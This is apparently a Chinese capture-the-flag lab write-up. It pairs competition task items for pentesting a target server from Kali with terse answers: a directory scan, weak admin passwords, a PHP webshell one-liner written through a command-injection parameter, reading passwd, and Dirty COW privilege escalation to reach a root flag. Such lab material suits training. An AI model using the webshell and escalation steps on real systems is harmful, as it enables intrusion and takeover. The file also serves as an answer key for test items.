1.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将后台管理 员 登 陆 的 地 址 作 为 Flag 提 交 ; ( IP 地 址 用 0.0.0.0 代 替 例 如 : |
扫描靶机目录发现后台地址 admin.php
2.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将后台管理 员的密码作为 Flag 提交; |
弱密码admin成功登录
3.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,获取到相应 的权限,使用相关命令获取到当前系统用户 id 为 69 的用户,将该用户的用户名 称作为 Flag 进行提交; |
在指定位置找到写入php代码位置
写入一句话木马
访问XML去处format 改成?test=echo "<?php system($_GET['test']);?>" > test.php 生成一句话木马后门文件
用蚁键或者网页命令执行查看passwd所有用户的命令 命令执行之后发现admin用户和id为69用户
4.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,获取到相应 的权限,使用 whoami 命令获取当前用户,将获取到的用户作为 Flag 提交; |
whoami查看用户
尝试弱密码123456登录admin用户 用藏牛提权firefart
7.提权之后登陆靶机,进入靶机的/root 目录将 root 目录的 flag.txt 文件 的内容作为 Flag 提交 |